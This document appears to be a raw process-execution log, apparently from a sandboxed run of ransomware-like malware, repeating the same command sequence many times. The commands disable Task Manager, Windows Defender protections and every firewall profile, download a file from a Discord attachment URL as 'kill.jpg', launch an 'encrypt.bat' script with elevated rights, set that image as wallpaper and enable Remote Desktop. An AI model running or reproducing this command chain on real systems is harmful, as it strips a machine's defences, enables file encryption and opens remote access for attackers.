reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

